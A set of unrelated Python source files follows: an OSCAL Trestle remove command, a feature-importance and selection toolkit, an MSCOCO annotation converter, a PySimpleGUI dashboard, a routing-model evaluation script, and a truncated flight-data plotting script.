# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Trestle Remove Command."""
import argparse
import logging
import pathlib
import traceback
from typing import List, Tuple
import trestle.common.const as const
import trestle.common.err as err
from trestle.common import log
from trestle.common.err import TrestleError
from trestle.common.model_utils import ModelUtils
from trestle.core.commands.command_docs import CommandPlusDocs
from trestle.core.commands.common.return_codes import CmdReturnCodes
from trestle.core.models.actions import CreatePathAction, RemoveAction, WriteFileAction
from trestle.core.models.elements import Element, ElementPath
from trestle.core.models.file_content_type import FileContentType
from trestle.core.models.plans import Plan
logger = logging.getLogger(__name__)
class RemoveCmd(CommandPlusDocs):
"""Remove a subcomponent to an existing model."""
name = 'remove'
def _init_arguments(self) -> None:
self.add_argument(
f'-{const.ARG_FILE_SHORT}',
f'--{const.ARG_FILE}',
help=const.ARG_DESC_FILE + ' to remove component/subcomponent to.',
required=True
)
self.add_argument(
f'-{const.ARG_ELEMENT_SHORT}',
f'--{const.ARG_ELEMENT}',
help=const.ARG_DESC_ELEMENT + ' to remove.',
required=True
)
def _run(self, args: argparse.Namespace) -> int:
"""Remove an OSCAL component/subcomponent to the specified component.
        This method takes as input a filename and a list of comma-separated element paths. Element paths are field aliases.
The method first finds the parent model from the file and loads the file into the model.
Then the method executes 'remove' for each of the element paths specified.
"""
try:
log.set_log_level_from_args(args)
args_dict = args.__dict__
file_path = pathlib.Path(args_dict[const.ARG_FILE]).resolve()
try:
relative_path = file_path.relative_to(args.trestle_root)
# Get parent model and then load json into parent model
except Exception:
logger.error(f'{file_path} is not part of the trestle project {args.trestle_root}')
return CmdReturnCodes.COMMAND_ERROR.value
try:
parent_model, parent_alias = ModelUtils.get_relative_model_type(relative_path)
            except Exception as e:
                logger.error(f'Remove failed (fs.get_relative_model_type()): {e}')
                return CmdReturnCodes.COMMAND_ERROR.value
try:
parent_object = parent_model.oscal_read(file_path)
            except Exception as e:
                logger.error(f'Remove failed (parent_model.oscal_read()): {e}')
                return CmdReturnCodes.COMMAND_ERROR.value
parent_element = Element(parent_object, parent_alias)
add_plan = Plan()
# Do _remove for each element_path specified in args
element_paths: List[str] = str(args_dict[const.ARG_ELEMENT]).split(',')
for elm_path_str in element_paths:
element_path = ElementPath(elm_path_str)
try:
remove_action, parent_element = self.remove(element_path, parent_element)
                except TrestleError as e:
                    logger.debug(f'self.remove() failed: {e}')
                    logger.error(f'Remove failed (self.remove()): {e}')
                    return CmdReturnCodes.COMMAND_ERROR.value
add_plan.add_action(remove_action)
            create_action = CreatePathAction(file_path, True)
            write_action = WriteFileAction(file_path, parent_element, FileContentType.to_content_type(file_path.suffix))
            add_plan.add_action(create_action)
            add_plan.add_action(write_action)
try:
add_plan.execute()
            except TrestleError as e:
                logger.debug(f'Remove failed at execute(): {e}')
                logger.error(f'Remove failed (execute()): {e}')
                return CmdReturnCodes.COMMAND_ERROR.value
return CmdReturnCodes.SUCCESS.value
except TrestleError as e:
logger.debug(traceback.format_exc())
logger.error(f'Error while removing OSCAL component: {e}')
return CmdReturnCodes.COMMAND_ERROR.value
except Exception as e: # pragma: no cover
logger.debug(traceback.format_exc())
logger.error(f'Unexpected error while removing OSCAL component: {e}')
return CmdReturnCodes.UNKNOWN_ERROR.value
@classmethod
def remove(cls, element_path: ElementPath, parent_element: Element) -> Tuple[RemoveAction, Element]:
"""For the element_path, remove a model from the parent_element of a given parent_model.
First we check if there is an existing element at that path
If not, we complain.
Then we set up an action plan to update the model (specified by file_path) in memory,
return the action and return the parent_element.
LIMITATIONS:
1. This does not remove elements of a list or dict. Instead, the entire list or dict is removed.
2. This cannot remove arbitrarily named elements that are not specified in the schema.
For example, "responsible-parties" contains named elements, e.g., "organisation". The tool will not
remove the "organisation" as it is not in the schema, but one can remove its elements, e.g., "party-uuids".
"""
element_path_list = element_path.get_full_path_parts()
if '*' in element_path_list:
raise err.TrestleError('trestle remove does not support Wildcard element path.')
deleting_element = parent_element.get_at(element_path)
if deleting_element is not None:
# The element already exists
if type(deleting_element) is list:
logger.warning(
'Warning: trestle remove does not support removing elements of a list: '
'this removes the entire list'
)
elif type(deleting_element) is dict:
logger.warning(
'Warning: trestle remove does not support removing dict elements: '
'this removes the entire dict element'
)
else:
raise err.TrestleError(f'Bad element path: {str(element_path)}')
remove_action = RemoveAction(parent_element, element_path)
return remove_action, parent_element
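# Usage sketch (hypothetical file/element paths):
#   trestle remove -f catalogs/nist/catalog.json -e catalog.metadata.roles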
|
the-stack_0_19798 | import numpy as np
import pandas as pd
import shap
import matplotlib.pyplot as plt
from sklearn.base import clone
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.metrics import r2_score, mean_squared_error, log_loss
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier
# data proprocessing
def load_data(Path):
data = pd.read_csv(Path, index_col=0)
col = 'diagnosis'
data[col] = data[col].astype('category').cat.as_ordered()
encoder = data[col].cat.categories
data[col] = data[col].cat.codes
data = data.drop(columns=['Unnamed: 32'])
return data
def split_target(df, target):
Y = df[target].values
X = df.drop(columns=[target])
return X, Y
def train_val_split(df, ratio):
train, val = train_test_split(df, train_size=ratio, shuffle=True)
return train, val
def label_encoding_with_NAs(train, val, col):
train[col] = train[col].astype('category').cat.as_ordered()
encoder = train[col].cat.categories
train[col] = train[col].cat.codes + 1
val[col] = pd.Categorical(val[col], categories=encoder, ordered=True)
val[col] = val[col].cat.codes + 1
# Data-based importance strategies
def top_rank(df, target, n=None, ascending=False, method='spearman'):
"""
Calculate first / last N correlation with target
This method is measuring single-feature relevance importance and works well for independent features
But suffers in the presence of codependent features.
pearson : standard correlation coefficient
kendall : Kendall Tau correlation coefficient
spearman : Spearman rank correlation
:return:
"""
if not n:
n = len(df.columns)
if method == 'PCA':
scaler = StandardScaler()
feas = [col for col in df.columns if col != target]
X = scaler.fit_transform(df.loc[:, feas])
pca = PCA(n_components=0.9)
pca.fit(X)
featimp = {feas[i]:abs(pca.components_[0])[i] for i in range(len(feas))}
feas = sorted(featimp, key=featimp.get, reverse=True)[:n]
vals = [featimp[fea] for fea in feas]
else:
feas = list(abs(df.corr(method=method)[target]).sort_values(ascending=ascending).index[1:n+1])
vals = list(abs(df.corr(method=method)[target]).sort_values(ascending=ascending))[1:n+1]
return feas, vals
def mRMR(df, target, mode='spearman', n=None, info=False):
if not n:
n = len(df.columns)
mrmr = dict()
# use different mode to calculate correaltion
feas, imps = top_rank(df, target, method=mode)
corr = dict([(fea, imp) for imp, fea in zip(imps, feas)])
selected_feat = [feas[0]]
for i in range(len(feas)):
rest_feat = [col for col in feas if col not in selected_feat]
if not len(rest_feat):
break
candi_mrmr = []
for fi in rest_feat:
redundancy = 0
relevance = corr[fi]
for fj in selected_feat:
feas, imps = top_rank(df.drop(columns=target), fj, method=mode)
corr_fj = dict([(fea, imp) for imp, fea in zip(imps, feas)])
redundancy += corr_fj[fi]
redundancy /= len(selected_feat)
candi_mrmr.append(relevance - redundancy)
max_feature = rest_feat[np.argmax(candi_mrmr)]
mrmr[max_feature] = np.max(candi_mrmr)
if info:
print(f'{i+1} iteration, selected {max_feature} feature with mRMR value = {mrmr[max_feature]:.3f}')
selected_feat.append(max_feature)
feat_imp = pd.Series(mrmr.values(), index=mrmr.keys()).sort_values(ascending=False)
return feat_imp.values[:n], feat_imp.index[:n]
# Model-based importance strategies
def permutation_importance(X_train, y_train, X_valid, y_valid, mode='R'):
model = rf_model(X_train, y_train, mode)
if mode == 'R':
baseline = r2_score(y_valid, model.predict(X_valid))
else:
baseline = log_loss(y_valid, model.predict_proba(X_valid))
imp = []
for col in X_valid.columns:
save = X_valid[col].copy()
X_valid[col] = np.random.permutation(X_valid[col])
if mode == 'R':
m = r2_score(y_valid, model.predict(X_valid))
else:
m = log_loss(y_valid, model.predict_proba(X_valid))
X_valid[col] = save
imp.append(baseline - m)
feat_imp = pd.Series(imp, index=X_valid.columns).sort_values(ascending=False)
return feat_imp.values, feat_imp.index
def dropcol_importances(X_train, y_train, X_valid, y_valid, mode='R'):
model = rf_model(X_train, y_train, mode)
baseline = model.oob_score_
imp = []
for col in X_train.columns:
X_train_ = X_train.drop(col, axis=1)
X_valid_ = X_valid.drop(col, axis=1)
model_ = clone(model)
model_.fit(X_train_, y_train)
m = model_.oob_score_
imp.append(baseline - m)
feat_imp = pd.Series(imp, index=X_valid.columns).sort_values(ascending=False)
return feat_imp.values, feat_imp.index
def shap_importances(x_train, y_train, x_val, y_val):
rf = rf_model(x_train, y_train, mode='R')
shap_values = shap.TreeExplainer(rf, data=x_train).shap_values(X=x_val, y=y_val, check_additivity=False)
imp = np.mean(np.abs(shap_values), axis=0)
return imp, x_val.columns
def rf_model(x_train, y_train, mode='R'):
hyper = {'min_samples_leaf':80, 'max_features':0.5, 'max_depth':15}
if mode == 'R':
rf = RandomForestRegressor(n_estimators=50,
min_samples_leaf=hyper['min_samples_leaf'],
max_features=hyper['max_features'],
max_depth=hyper['max_depth'],
oob_score=True,
n_jobs=-1)
else:
rf = RandomForestClassifier(n_estimators=50,
min_samples_leaf=hyper['min_samples_leaf'],
max_features=hyper['max_features'],
max_depth=hyper['max_depth'],
oob_score=True,
n_jobs=-1)
rf.fit(x_train, y_train)
return rf
# Visualizing importances
def plot_feature_importances(importances, columns, title, n=None, size=(15, 15), show_values=False, show_var=[0]):
if not n:
n = len(columns)
n_importances = pd.Series(importances, index=columns).sort_values(ascending=True)[-n:]
fig, ax = plt.subplots(figsize=size)
if not any(show_var):
n_importances.plot.barh(color='#4daf4a')
else:
ax.barh(n_importances.index,
n_importances,
xerr=sorted(show_var), color='#4daf4a')
if show_values:
for i, bar in enumerate(ax.patches):
if bar.get_width() < 0:
p = bar.get_width()-0.02
else:
p = bar.get_width()+0.005
ax.text(p, bar.get_y()+0.15, str(round((n_importances[i]), 2)), fontsize=10, color='black')
ax.set_title("Feature Importances - " + title, fontsize=20, loc='left', pad=30)
ax.set_ylabel("Feature")
ax.xaxis.set_ticks_position('none')
ax.yaxis.set_ticks_position('none')
plt.ylim(-1, n)
fig.tight_layout()
plt.grid()
# Comparing strategies
def Top_k_loss(x_train, y_train, x_val, y_val, feat, imp, k=15, metric=log_loss):
model = rf_model(x_train, y_train, mode='C')
loss_list = []
n_imp = pd.Series(imp, index=feat).sort_values(ascending=False)[:k+1]
for i in range(1, k+1):
model_ = clone(model)
features = n_imp.index[:i]
model_.fit(x_train.loc[:, features], y_train)
pred = model_.predict_proba(x_val.loc[:, features])
loss = metric(y_val, pred)
loss_list.append(loss)
return loss_list
def compare_Top_k(data, target, k=10):
train, val = train_val_split(data, 0.8)
x_train, y_train = split_target(train, target)
x_val, y_val = split_target(val, target)
feat_spearman, imp_spearman = top_rank(data, target, method='spearman')
loss_spearman = Top_k_loss(x_train, y_train, x_val, y_val, feat_spearman, imp_spearman, k=k)
feat_pearson, imp_pearson = top_rank(data, target, method='pearson')
loss_pearson = Top_k_loss(x_train, y_train, x_val, y_val, feat_pearson, imp_pearson, k=k)
feat_kendall, imp_kendall = top_rank(data, target, method='kendall')
loss_kendall = Top_k_loss(x_train, y_train, x_val, y_val, feat_kendall, imp_kendall, k=k)
feat_pca, imp_pca = top_rank(data, target, method='PCA')
    loss_pca = Top_k_loss(x_train, y_train, x_val, y_val, feat_pca, imp_pca, k=k)
imp_perm, feat_perm = permutation_importance(x_train, y_train, x_val, y_val, mode='R')
loss_perm = Top_k_loss(x_train, y_train, x_val, y_val, feat_perm, imp_perm, k=k)
imp_drop, feat_drop = dropcol_importances(x_train, y_train, x_val, y_val, mode='R')
loss_drop = Top_k_loss(x_train, y_train, x_val, y_val, feat_drop, imp_drop, k=k)
imp_shap, feat_shap = shap_importances(x_train, y_train, x_val, y_val)
loss_shap = Top_k_loss(x_train, y_train, x_val, y_val, feat_shap, imp_shap, k=k)
imp_mrmr, feat_mrmr = mRMR(data, target)
loss_mrmr = Top_k_loss(x_train, y_train, x_val, y_val, feat_mrmr, imp_mrmr, k=k)
fig = plt.figure(figsize=(15,15))
ax = plt.axes()
ax.grid(False)
x, markers = range(1, k+1), ['o', '8', 's', 'p', '+', '*', 'h', 'v']
plt.plot(x, loss_spearman, '#BA5645', marker=markers[0], label='Spearman')
plt.plot(x, loss_pearson, '#BA8949', marker=markers[1], label='Pearson')
plt.plot(x, loss_kendall, '#8DBA49', marker=markers[2], label='Kendall')
plt.plot(x, loss_pca, '#49A7BA', marker=markers[3], label='PCA')
plt.plot(x, loss_perm, '#6E49BA', marker=markers[4], label='Permutation')
plt.plot(x, loss_drop, '#BA49A0', marker=markers[5], label='Drop Column')
plt.plot(x, loss_shap, '#878784', marker=markers[6], label='Shap')
plt.plot(x, loss_mrmr, '#000000', marker=markers[7], label='mRMR')
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels)
ax.set_ylabel('Log Loss', fontsize=10)
ax.set_xlabel('Top K selected features', fontsize=10)
plt.show()
# Automatic feature selection
def auto_featSelection(data, target, mode='permutation', metric=log_loss):
train, val = train_val_split(data, 0.8)
x_train, y_train = split_target(train, target)
x_val, y_val = split_target(val, target)
model = rf_model(x_train, y_train, mode='C')
model_ = clone(model)
model_.fit(x_train, y_train)
pred = model_.predict_proba(x_val)
val_loss = metric(y_val, pred)
# choose mode for featimp
if mode == 'spearman':
feat, imp = top_rank(data, target, method='spearman')
elif mode == 'pearson':
feat, imp = top_rank(data, target, method='pearson')
elif mode == 'kendall':
feat, imp = top_rank(data, target, method='kendall')
elif mode == 'pca':
feat, imp = top_rank(data, target, method='PCA')
elif mode == 'permutation':
imp, feat = permutation_importance(x_train, y_train, x_val, y_val, mode='R')
elif mode == 'dropcol':
imp, feat = dropcol_importances(x_train, y_train, x_val, y_val, mode='R')
elif mode == 'shap':
imp, feat = shap_importances(x_train, y_train, x_val, y_val)
elif mode == 'mrmr':
imp, feat = mRMR(data, target)
else:
print('Wrong mode name')
val_loss_new = 0
i = 0
while True:
i += 1
drop_feat = feat[-i:]
model_ = clone(model)
x_train_drop = x_train.drop(columns=drop_feat)
x_val_drop = x_val.drop(columns=drop_feat)
model_.fit(x_train_drop, y_train)
pred_new = model_.predict_proba(x_val_drop)
val_loss_new = metric(y_val, pred_new)
# if worse, use the previos one
if val_loss_new > val_loss:
if i == 1:
return model_, []
drop_feat = feat[-i+1:]
model_ = clone(model)
x_train_drop = x_train.drop(columns=drop_feat)
x_val_drop = x_val.drop(columns=drop_feat)
model_.fit(x_train_drop, y_train)
break
val_loss = val_loss_new
return model_, drop_feat
# Variance and empirical p-values for feature importances
def feature_variance(data, target, mode='shap'):
"""
Calculate standard deviation using booststraping
"""
train, val = train_val_split(data, 0.8)
x_train, y_train = split_target(train, target)
n = 100
imp_n = []
for i in range(n):
idx = np.random.choice(range(val.shape[0]), size=val.shape[0], replace=True)
x_new, y_new = split_target(val.iloc[idx, :], target)
if mode == 'shap':
imp, _ = shap_importances(x_train, y_train, x_new, y_new)
elif mode == 'permutation':
imp, _ = permutation_importance(x_train, y_train, x_new, y_new)
elif mode == 'dropcol':
imp, _ = dropcol_importances(x_train, y_train, x_new, y_new)
imp_n.append(imp)
return np.std(np.array(imp_n), axis=0)
def feature_pvalue(data, target, mode='shap', metric=log_loss):
train, val = train_val_split(data, 0.8)
x_train, y_train = split_target(train, target)
x_val, y_val = split_target(val, target)
n = 100
n_imp = []
if mode == 'shap':
baseline, feas = shap_importances(x_train, y_train, x_val, y_val)
elif mode == 'permutation':
baseline, feas = permutation_importance(x_train, y_train, x_val, y_val)
elif mode == 'dropcol':
baseline, feas = dropcol_importances(x_train, y_train, x_val, y_val)
else:
print('Wrong mode name')
return
baseline = baseline / np.sum(baseline)
for i in range(n):
idx = np.random.choice(range(val.shape[0]), size=val.shape[0], replace=True)
x_new, y_new = split_target(val.iloc[idx, :], target)
if mode == 'shap':
imp, _ = shap_importances(x_train, y_train, x_new, y_new)
elif mode == 'permutation':
imp, _ = permutation_importance(x_train, y_train, x_new, y_new)
elif mode == 'dropcol':
imp, _ = dropcol_importances(x_train, y_train, x_new, y_new)
imp = imp / np.sum(imp)
n_imp.append(imp)
diff = baseline - n_imp
p_values = np.sum(diff <= 0, axis=0) / n
return p_values, baseline, np.array(n_imp), feas
def pvalue_hist(p_values, baseline, imps, feas, k=0, size=(14,8), alpha=0.05):
"""
Create a null distribution histogram for given top kth feature
"""
list_plots = []
fig, ax = plt.subplots(figsize=size)
plt.hist(imps[:, k], bins='auto')
ax.axvline(x=baseline[k], c='red')
if p_values[k] < alpha:
plt.title(f"Null Distributions Histogram for significant feature: {feas[k]} with p-value: {p_values[k]}")
else:
plt.title(f"Null Distributions Histogram for insignificant feature: {feas[k]} with p-value: {p_values[k]}")
    plt.show()
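# Demonstration sketch: an end-to-end run of the strategies above. The CSV
# path is a placeholder for any dataset with a binary 'diagnosis' column
# (e.g. the Wisconsin breast-cancer data this preprocessing was written for).
if __name__ == '__main__':
    data = load_data('data.csv')
    feas, vals = top_rank(data, 'diagnosis', n=10, method='spearman')
    plot_feature_importances(vals, feas, 'Spearman', show_values=True)
    compare_Top_k(data, 'diagnosis', k=10)
    model, dropped = auto_featSelection(data, 'diagnosis', mode='permutation')
    print('features dropped by auto selection:', list(dropped))
|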
the-stack_0_19799 | import json
import os
def save_json(load_type):
# Define path to mscoco images data
base_img_path = '/path/to/mscoco/images/' ###### REPLACE with path to dataset
base_annot_path = '/path/to/mscoco/annotations/'###### REPLACE with path to dataset
f = open(os.path.join(base_annot_path,'instances_'+load_type+'2014.json'),'r')
x = json.load(f)
f.close()
imgids = [[idx['id'], idx['file_name'], idx['width'], idx['height']] for idx in x['images']]
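    # imgids rows: [image id, file name, width, height]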
dd = {}
for idx in imgids:
frame_dict = dict(objs=[], img_path=idx[1])
dd[idx[0]] = dict(frames=[frame_dict], base_path=os.path.join(base_img_path,load_type+'2014'), frame_size=[idx[2],idx[3]])
print('finished imgids')
count = 0
for annot in x['annotations']:
image_id = annot['image_id']
trackid = len(dd[image_id]['frames'][0]['objs'])
cat = annot['category_id']
bbox = annot['bbox'] # [x,y,width,height]
bbox = [bbox[0], bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]] # [xmin, ymin, xmax, ymax]
iscrowd=annot['iscrowd']
obj_info = dict(trackid=trackid, c=cat, iscrowd=iscrowd, bbox=bbox)
dd[image_id]['frames'][0]['objs'].append(obj_info)
count+=1
if count%1000==0:
print(count)
writef = open('mscoco_'+load_type+'.json', 'w')
    json.dump(list(dd.values()), writef)  # dict_values is not JSON-serializable
writef.close()
save_json('train')
save_json('val')
|
the-stack_0_19801 | import PySimpleGUI as sg
"""
Dashboard using blocks of information.
Copyright 2020 PySimpleGUI.org
"""
theme_dict = {'BACKGROUND': '#2B475D',
'TEXT': '#FFFFFF',
'INPUT': '#F2EFE8',
'TEXT_INPUT': '#000000',
'SCROLL': '#F2EFE8',
'BUTTON': ('#000000', '#C2D4D8'),
'PROGRESS': ('#FFFFFF', '#C7D5E0'),
'BORDER': 1, 'SLIDER_DEPTH': 0, 'PROGRESS_DEPTH': 0}
# sg.theme_add_new('Dashboard', theme_dict) # if using 4.20.0.1+
sg.LOOK_AND_FEEL_TABLE['Dashboard'] = theme_dict
sg.theme('Dashboard')
BORDER_COLOR = '#C7D5E0'
DARK_HEADER_COLOR = '#1B2838'
BPAD_TOP = ((20, 20), (20, 10))
BPAD_LEFT = ((20, 10), (0, 10))
BPAD_LEFT_INSIDE = (0, 10)
BPAD_RIGHT = ((10, 20), (10, 20))
top_banner = [[sg.Text('Dashboard' + ' '*64, font='Any 20', background_color=DARK_HEADER_COLOR),
sg.Text('Tuesday 9 June 2020', font='Any 20', background_color=DARK_HEADER_COLOR)]]
top = [[sg.Text('The Weather Will Go Here', size=(50, 1), justification='c', pad=BPAD_TOP, font='Any 20')],
[sg.T(f'{i*25}-{i*34}') for i in range(7)], ]
block_3 = [[sg.Text('Block 3', font='Any 20')],
[sg.Input(), sg.Text('Some Text')],
[sg.Button('Go'), sg.Button('Exit')]]
block_2 = [[sg.Text('Block 2', font='Any 20')],
[sg.T('This is some random text')],
[sg.Image(data=sg.DEFAULT_BASE64_ICON)]]
block_4 = [[sg.Text('Block 4', font='Any 20')],
[sg.T('This is some random text')],
[sg.T('This is some random text')],
[sg.T('This is some random text')],
[sg.T('This is some random text')]]
layout = [[sg.Column(top_banner, size=(960, 60), pad=(0, 0), background_color=DARK_HEADER_COLOR)],
[sg.Column(top, size=(920, 90), pad=BPAD_TOP)],
[sg.Column([[sg.Column(block_2, size=(450, 150), pad=BPAD_LEFT_INSIDE)],
[sg.Column(block_3, size=(450, 150), pad=BPAD_LEFT_INSIDE)]], pad=BPAD_LEFT, background_color=BORDER_COLOR),
sg.Column(block_4, size=(450, 320), pad=BPAD_RIGHT)]]
window = sg.Window('Dashboard PySimpleGUI-Style', layout, margins=(0, 0),
background_color=BORDER_COLOR, no_titlebar=True, grab_anywhere=True)
while True: # Event Loop
event, values = window.read()
if event == sg.WIN_CLOSED or event == 'Exit':
break
window.close()
|
the-stack_0_19802 | import math
import torch
import os
import argparse
import numpy as np
import itertools
from tqdm import tqdm
from utils import load_model, move_to
from utils.data_utils import save_dataset
from torch.utils.data import DataLoader
import time
from datetime import timedelta
from utils.functions import parse_softmax_temperature
mp = torch.multiprocessing.get_context('spawn')
import warnings
warnings.filterwarnings("ignore", message="indexing with dtype torch.uint8 is now deprecated, please use a dtype torch.bool instead.")
def get_best(sequences, cost, ids=None, batch_size=None):
"""
Ids contains [0, 0, 0, 1, 1, 2, ..., n, n, n] if 3 solutions found for 0th instance, 2 for 1st, etc
:param sequences:
:param lengths:
:param ids:
:return: list with n sequences and list with n lengths of solutions
"""
if ids is None:
idx = cost.argmin()
return sequences[idx:idx+1, ...], cost[idx:idx+1, ...]
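    # Segmented argmin over variable-length groups: `splits` marks where each
    # instance's solutions begin, reduceat takes each group's minimum cost, and
    # the reversed scatter below keeps the first index attaining that minimum.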
splits = np.hstack([0, np.where(ids[:-1] != ids[1:])[0] + 1])
mincosts = np.minimum.reduceat(cost, splits)
group_lengths = np.diff(np.hstack([splits, len(ids)]))
all_argmin = np.flatnonzero(np.repeat(mincosts, group_lengths) == cost)
result = np.full(len(group_lengths) if batch_size is None else batch_size, -1, dtype=int)
result[ids[all_argmin[::-1]]] = all_argmin[::-1]
return [sequences[i] if i >= 0 else None for i in result], [cost[i] if i >= 0 else math.inf for i in result]
def eval_dataset_mp(args):
(dataset_path, width, softmax_temp, opts, i, num_processes) = args
model, _ = load_model(opts.model)
val_size = opts.val_size // num_processes
dataset = model.problem.make_dataset(filename=dataset_path, num_samples=val_size, offset=opts.offset + val_size * i)
device = torch.device("cuda:{}".format(i))
return _eval_dataset(model, dataset, width, softmax_temp, opts, device)
def eval_dataset(dataset_path, width, softmax_temp, opts):
# Even with multiprocessing, we load the model here since it contains the name where to write results
model, _ = load_model(opts.model)
use_cuda = torch.cuda.is_available() and not opts.no_cuda
model.use_cuda = use_cuda
if opts.multiprocessing:
assert use_cuda, "Can only do multiprocessing with cuda"
num_processes = torch.cuda.device_count()
assert opts.val_size % num_processes == 0
with mp.Pool(num_processes) as pool:
results = list(itertools.chain.from_iterable(pool.map(
eval_dataset_mp,
[(dataset_path, width, softmax_temp, opts, i, num_processes) for i in range(num_processes)]
)))
else:
device = torch.device("cuda:0" if use_cuda else "cpu")
dataset = model.problem.make_dataset(filename=dataset_path, num_samples=opts.val_size, offset=opts.offset)
results = _eval_dataset(model, dataset, width, softmax_temp, opts, device)
# This is parallelism, even if we use multiprocessing (we report as if we did not use multiprocessing, e.g. 1 GPU)
parallelism = opts.eval_batch_size
costs, tours, durations = zip(*results) # Not really costs since they should be negative
print("Average cost: {} +- {}".format(np.mean(costs), 2 * np.std(costs) / np.sqrt(len(costs))))
print("Average serial duration: {} +- {}".format(
np.mean(durations), 2 * np.std(durations) / np.sqrt(len(durations))))
print("Average parallel duration: {}".format(np.mean(durations) / parallelism))
print("Calculated total duration: {}".format(timedelta(seconds=int(np.sum(durations) / parallelism))))
dataset_basename, ext = os.path.splitext(os.path.split(dataset_path)[-1])
model_name = "_".join(os.path.normpath(os.path.splitext(opts.model)[0]).split(os.sep)[-2:])
if opts.o is None:
results_dir = os.path.join(opts.results_dir, model.problem.NAME, dataset_basename)
os.makedirs(results_dir, exist_ok=True)
out_file = os.path.join(results_dir, "{}-{}-{}{}-t{}-{}-{}{}".format(
dataset_basename, model_name,
opts.decode_strategy,
width if opts.decode_strategy != 'greedy' else '',
softmax_temp, opts.offset, opts.offset + len(costs), ext
))
else:
out_file = opts.o
assert opts.f or not os.path.isfile(
out_file), "File already exists! Try running with -f option to overwrite."
save_dataset((results, parallelism), out_file)
return costs, tours, durations
def _eval_dataset(model, dataset, width, softmax_temp, opts, device):
model.to(device)
model.eval()
model.set_decode_type(
"greedy" if opts.decode_strategy in ('bs', 'greedy') else "sampling",
temp=softmax_temp)
dataloader = DataLoader(dataset, batch_size=opts.eval_batch_size)
results = []
for batch in tqdm(dataloader, disable=opts.no_progress_bar, ascii=True):
if model.problem.NAME is "tspsl":
batch = move_to(batch["nodes_coord"], device)
else:
batch = move_to(batch, device)
start = time.time()
with torch.no_grad():
if opts.decode_strategy in ('sample', 'greedy'):
if opts.decode_strategy == 'greedy':
assert width == 0, "Do not set width when using greedy"
assert opts.eval_batch_size <= opts.max_calc_batch_size, \
"eval_batch_size should be smaller than calc batch size"
batch_rep = 1
iter_rep = 1
elif width * opts.eval_batch_size > opts.max_calc_batch_size:
assert opts.eval_batch_size == 1
assert width % opts.max_calc_batch_size == 0
batch_rep = opts.max_calc_batch_size
iter_rep = width // opts.max_calc_batch_size
else:
batch_rep = width
iter_rep = 1
assert batch_rep > 0
# This returns (batch_size, iter_rep shape)
sequences, costs = model.sample_many(batch, batch_rep=batch_rep, iter_rep=iter_rep)
batch_size = len(costs)
ids = torch.arange(batch_size, dtype=torch.int64, device=costs.device)
else:
assert opts.decode_strategy == 'bs'
cum_log_p, sequences, costs, ids, batch_size = model.beam_search(
batch, beam_size=width,
compress_mask=opts.compress_mask,
max_calc_batch_size=opts.max_calc_batch_size
)
if sequences is None:
sequences = [None] * batch_size
costs = [math.inf] * batch_size
else:
sequences, costs = get_best(
sequences.cpu().numpy(), costs.cpu().numpy(),
ids.cpu().numpy() if ids is not None else None,
batch_size
)
duration = time.time() - start
for seq, cost in zip(sequences, costs):
if model.problem.NAME in ("tsp", "tspsl"):
seq = seq.tolist() # No need to trim as all are same length
elif model.problem.NAME in ("cvrp", "sdvrp"):
seq = np.trim_zeros(seq).tolist() + [0] # Add depot
elif model.problem.NAME in ("op", "pctsp"):
seq = np.trim_zeros(seq) # We have the convention to exclude the depot
else:
assert False, "Unkown problem: {}".format(model.problem.NAME)
# Note VRP only
results.append((cost, seq, duration))
return results
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("datasets", nargs='+', help="Filename of the dataset(s) to evaluate")
parser.add_argument("-f", action='store_true', help="Set true to overwrite")
parser.add_argument("-o", default=None, help="Name of the results file to write")
parser.add_argument('--val_size', type=int, default=10000,
help='Number of instances used for reporting validation performance')
parser.add_argument('--offset', type=int, default=0,
help='Offset where to start in dataset (default 0)')
parser.add_argument('--eval_batch_size', type=int, default=1024,
help="Batch size to use during (baseline) evaluation")
parser.add_argument('--width', type=int, nargs='+',
help='Sizes of beam to use for beam search (or number of samples for sampling), '
'0 to disable (default), -1 for infinite')
parser.add_argument('--decode_strategy', type=str,
help='Beam search (bs), Sampling (sample) or Greedy (greedy)')
parser.add_argument('--softmax_temperature', type=parse_softmax_temperature, default=1,
help="Softmax temperature (sampling or bs)")
parser.add_argument('--model', type=str)
parser.add_argument('--no_cuda', action='store_true', help='Disable CUDA')
parser.add_argument('--no_progress_bar', action='store_true', help='Disable progress bar')
parser.add_argument('--compress_mask', action='store_true', help='Compress mask into long')
parser.add_argument('--max_calc_batch_size', type=int, default=10000, help='Size for subbatches')
parser.add_argument('--results_dir', default='results', help="Name of results directory")
parser.add_argument('--multiprocessing', action='store_true',
help='Use multiprocessing to parallelize over multiple GPUs')
opts = parser.parse_args()
assert opts.o is None or (len(opts.datasets) == 1 and len(opts.width) <= 1), \
"Cannot specify result filename with more than one dataset or more than one width"
widths = opts.width if opts.width is not None else [0]
for width in widths:
for dataset_path in opts.datasets:
eval_dataset(dataset_path, width, opts.softmax_temperature, opts)
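# Example invocation (sketch; dataset and checkpoint paths are placeholders):
#   python eval.py data/tsp/tsp20_test_seed1234.pkl --model pretrained/tsp_20 \
#       --decode_strategy greedy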
|
the-stack_0_19804 | """
@function: analyzing data relying on visualization
@author: Tengyao Li
@date: 2018/09/11
@update: 2018/09/12
"""
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import pandas as pd
import time
from util.parameter import DATA_INPUT_PATH
# merge dataset for different hours
hour_limitation = 1 # limit the amount of dataset to merge
df = pd.DataFrame()
for hour in range(hour_limitation):
if hour < 10:
dfx = pd.read_csv(DATA_INPUT_PATH + '/states_2019-12-23-0%i.csv' % hour)
else:
dfx = pd.read_csv(DATA_INPUT_PATH + '/states_2019-12-23-%i.csv' % hour)
dfx.time = dfx.time.apply(lambda x: time.strftime("%H:%M:%S", time.localtime(x)))
df = df.append(dfx, ignore_index=True)
loop = 1 # limit the amount of flights
highest_altitude = df.baroaltitude.max() # used to limit the axis range
for icao in df.icao24.unique():
df_cruise = df.loc[df.icao24 == icao] # get the current flight route
# plot the flight track ( the point to get off is marked with circle)
fig0 = plt.figure()
